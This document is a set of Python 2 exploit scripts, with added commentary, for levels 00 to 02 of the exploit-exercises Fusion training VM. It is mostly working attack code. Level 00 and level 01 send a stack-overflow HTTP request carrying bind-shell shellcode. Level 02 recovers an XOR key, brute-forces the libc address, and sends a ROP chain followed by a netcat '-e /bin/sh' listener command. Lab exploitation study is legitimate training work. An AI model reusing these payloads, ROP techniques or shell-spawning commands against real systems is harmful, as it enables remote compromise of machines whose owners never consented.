exploit-exercises fusion level00 level01 level02
# Exploit for https://exploit-exercises.com/fusion/level00/
# a0rtega
from struct import pack
import socket
# Python 2 script: the `print data` statements and the str-typed shellcode
# bytes mean it does not run unchanged on Python 3 (bytes vs. str).
#
# Level summary (from the author's comments and the request layout below): the
# service overflows a stack buffer with request data, and the buffer's stack
# address is known to the client, so a fixed return address can point back
# into the request itself.  A stack canary, a non-executable stack (NX), or a
# randomized stack that is *not* leaked would each defeat this exact approach;
# the level is presumably built without them.
#
# Shell Bind TCP Shellcode Port 1337 - 89 bytes
# Opaque byte blob as given by the author; the "\x05\x39" (0x0539 == 1337) and
# the "/bin//sh" bytes near the end are consistent with that description.
shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
# 139 bytes of filler from the overflowed buffer up to the saved return
# address -- the author's measured distance, not derivable from this page.
overflow = "A"*139
# Author's earlier crash-test value, left commented out (dead code).
#retuaddr = "BBBB"
# Return address = leaked stack address + 157.  Given the layout below, that
# offset presumably lands inside `shellcode`, which follows " HTTP/1.1".
retuaddr = pack("<L", 0xbffff8f8 + 157) # This address is leaked to us
# Wire layout: "GET /" + filler + return address + " HTTP/1.1" + shellcode.
# The level's handler presumably copies enough of the path to overwrite the
# saved return address; the page does not show the server-side code.
request = "GET /" + overflow + retuaddr + " HTTP/1.1" + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Target is the exploit-exercises Fusion VM; level00 listens on port 20000.
s.connect(("192.168.56.105", 20000))
s.sendall(request)
# Two best-effort reads for diagnostics only: each recv() may return fewer
# than 1024 bytes and nothing below depends on their length.  There is no
# try/finally, so an error in connect()/recv() leaves the socket to the GC.
data = s.recv(1024)
data2 = s.recv(1024)
s.close()
print data
print data2
# Exploit for https://exploit-exercises.com/fusion/level01/
# a0rtega
from struct import pack
import socket
# Python 2 script (print statements, str-typed shellcode); see level00 above.
#
# Level summary (from the author's comments): unlike level00 the buffer's
# stack address is not known here, so the overwritten return address points
# at fixed gadgets in the main binary (0x0804xxxx -- presumably a non-PIE text
# segment) and execution reaches the stack through `jmp esp`.  PIE would
# remove the fixed gadget addresses; NX would stop `jmp esp` from running
# request data.
#
# 128-byte NOP sled, then the Shell Bind TCP Shellcode Port 1337 - 89 bytes
shellcode = "\x90" * 128
shellcode += "\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
# Filler plus gadget addresses; the total is 15 + 4 + 118 + 2 == 139 bytes,
# the same distance to the saved return address as in level00.
overflow = "A"*15
# Per the author's note, the stack-adjusting gadget's final `ret` pops this
# dword.  `pack()` returns a str in Python 2, so the concatenation is byte-wise.
overflow += pack("<L", 0x08049f4f); # jmp esp <- after add esp, 0x1c and pops, ret is this
# The author treats 0x41 ("A") as a single-byte no-op (on 32-bit x86 it is
# `inc ecx`), so this run doubles as a sled once `jmp esp` lands in it.
overflow += "A"*118
# Short relative jump forward, over the return address and " HTTP/1.1", into
# the NOP sled that precedes the shellcode.
overflow += "\xeb\x10" # jmp 0x12 <- this is to jump HTTP/1.1 after \x41 'nopsled'
# Saved return address -> gadget that moves esp up the frame and returns
# into the `jmp esp` dword placed at offset 15 above (per the author's
# comments; the exact frame layout is not visible on this page).
retuaddr = pack("<L", 0x08049a29) # add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
# Same wire layout as level00: "GET /" + filler/gadgets + return address +
# " HTTP/1.1" + sled + shellcode.
request = "GET /" + overflow + retuaddr + " HTTP/1.1" + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# level01 listens on port 20001 on the Fusion VM.
s.connect(("192.168.56.105", 20001))
s.sendall(request)
# Diagnostic reads only; recv() may return fewer bytes than requested.  The
# socket is not closed on an exception (no try/finally).
data = s.recv(1024)
data2 = s.recv(1024)
s.close()
print data
print data2
# Exploit for https://exploit-exercises.com/fusion/level02/
# a0rtega
from struct import pack
import socket
import time
from itertools import cycle, izip
def xor_strings(s, k):
    """Return `s` XOR-ed byte-wise with `k`, repeating `k` as needed.

    Python 2 str in, Python 2 str out.  Used below both to recover the
    service's XOR key from a known plaintext (the 128 "A"s that are echoed
    back encrypted) and to pre-encrypt the payload with that key.  A fixed or
    reused XOR key stream is fully recoverable from a single known plaintext,
    which is the weakness this level is built around.

    Note: `cycle(k)` of an empty `k` yields nothing, so `k == ""` returns ""
    for any `s`; callers must pass a non-empty key.
    """
    # izip is Python 2 only (plain zip in Python 3); cycle(k) repeats the key,
    # so the output length equals len(s).
    return "".join(chr(ord(c)^ord(k)) for c,k in izip(s, cycle(k)))
# libc ASLR ranges may not be very accurate
#
# Brute-force loop over candidate libc load addresses, one page (0x1000) per
# attempt, from 0xb7500000 up to (not including) 0xb7900000: 0x400 attempts.
# Every gadget address in the chain is libc_base + a fixed offset, so a wrong
# guess just crashes that connection and the next candidate is tried.  There
# is no success check and no `break`; the loop runs to the end of the range.
# (Python 2 script: print statements, str-as-bytes, itertools.izip.)
libc_base = 0xb7500000
while (libc_base < 0xb7900000):
    print "Trying libc: 0x%x" % libc_base
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # level02 listens on port 20002 on the Fusion VM.  No try/except or
    # try/finally: a socket.error anywhere in the exchange below (e.g. the
    # peer crashing on a wrong guess before the final sends) propagates and
    # ends the whole loop with this socket still open.
    s.connect(("192.168.56.105", 20002))
    # Header
    data = s.recv(4096)
    # --- Step 1: key recovery.  Send 128 known bytes through the "E" op and
    # read back their XOR-encrypted form; XOR with the known plaintext gives
    # the first 128 key bytes.  (The nread/nwrite comments mirror the level's
    # source as quoted by the author; the server code is not on this page.)
    # nread(0, &op, sizeof(op));
    s.send("E")
    # nread(0, &sz, sizeof(sz));
    s.send(pack("<I", 128))
    # nread(0, buffer, sz);
    s.send("A" * 128)
    time.sleep(0.1)
    # Header 2
    data = s.recv(120)
    # nwrite(1, &sz, sizeof(sz));
    data = s.recv(5)
    # nwrite(1, buffer, sz);
    # NOTE(review): recv(128) may legally return fewer than 128 bytes; the
    # recovered key would then be short and the payload below mis-encrypted
    # for this attempt.  Reading in a loop until 128 bytes arrive would be
    # more robust.  The same applies to the fixed-size recv() calls above.
    data = s.recv(128)
    encryption_key = xor_strings(data[0:128], "A")
    # --- Step 2: a second "E" op carrying the ROP chain, pre-encrypted with
    # the recovered key so the service's XOR turns it back into the intended
    # bytes.  The payload is far longer than the 128 recovered key bytes, so
    # cycle() in xor_strings assumes the service's key stream repeats every
    # 128 bytes -- TODO confirm against the level source.
    # nread(0, &op, sizeof(op));
    s.send("E")
    # ROPGadget to the rescue! :)
    # Chain, per the per-gadget comments: store "/bin" and "//sh" as two
    # dwords into libc's .data, a zero dword right after them, then load
    # ebx = &"/bin//sh", ecx = edx = &zero, eax = 11 (xor + 11x inc) and
    # `int 0x80`.  On i386 Linux syscall 11 is execve, which matches the
    # string being built.  None of the offsets are derivable from this page.
    p = ''
    p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
    p += pack('<I', libc_base+0x00178020) # @ .data
    p += pack('<I', libc_base+0x000238df) # pop eax ; ret
    p += '/bin'
    p += pack('<I', libc_base+0x0008c49c) # mov dword ptr [edx], eax ; ret
    p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
    p += pack('<I', libc_base+0x00178024) # @ .data + 4
    p += pack('<I', libc_base+0x000238df) # pop eax ; ret
    p += '//sh'
    p += pack('<I', libc_base+0x0008c49c) # mov dword ptr [edx], eax ; ret
    p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
    p += pack('<I', libc_base+0x00178028) # @ .data + 8
    p += pack('<I', libc_base+0x0002eb8f) # xor eax, eax ; ret
    p += pack('<I', libc_base+0x0008c49c) # mov dword ptr [edx], eax ; ret
    p += pack('<I', libc_base+0x00018f4e) # pop ebx ; ret
    p += pack('<I', libc_base+0x00178020) # @ .data
    p += pack('<I', libc_base+0x0002da2b) # pop ecx ; pop edx ; ret
    p += pack('<I', libc_base+0x00178028) # @ .data + 8
    # Consumed by the second pop of `pop ecx ; pop edx`; the value is
    # irrelevant because edx is reloaded by the very next gadget.
    p += pack('<I', libc_base+0x41414141) # padding
    p += pack('<I', libc_base+0x00001a9e) # pop edx ; ret
    p += pack('<I', libc_base+0x00178028) # @ .data + 8
    p += pack('<I', libc_base+0x0002eb8f) # xor eax, eax ; ret
    # Eleven increments: eax = 11.
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x00026722) # inc eax ; ret
    p += pack('<I', libc_base+0x0002dd35) # int 0x80
    # Declared size: 128 KiB + 16 bytes of filler plus the chain.  The filler
    # length is presumably the author's measured distance to the saved return
    # address; it is not derivable from this page.
    # nread(0, &sz, sizeof(sz));
    s.send(pack("<I", (4096 * 32) + 16 + len(p)))
    # nread(0, buffer, sz);
    # Author's earlier crash test ("BBBB" as return address), left commented out.
    #s.send(xor_strings("A" * ((4096 * 32) + 16) + "BBBB", encryption_key))
    s.send(xor_strings("A" * ((4096 * 32) + 16) + p, encryption_key))
    time.sleep(0.1)
    data = s.recv(5)
    # Drains the echo of the encrypted buffer; a short read is harmless here
    # because `data` is not used afterwards.
    data = s.recv((4096 * 32) + 16 + len(p))
    # "Q" ends the exchange; on the correct base the chain then runs and the
    # following line is read by the spawned shell (per the author's design).
    # On a wrong guess the peer has presumably crashed, and these send() calls
    # may raise socket.error, which would terminate the loop (see above).
    s.send("Q")
    s.send("/bin/nc.traditional -lp1337 -e/bin/sh\n")
    s.close()
    # Next candidate page.
    libc_base += 0x1000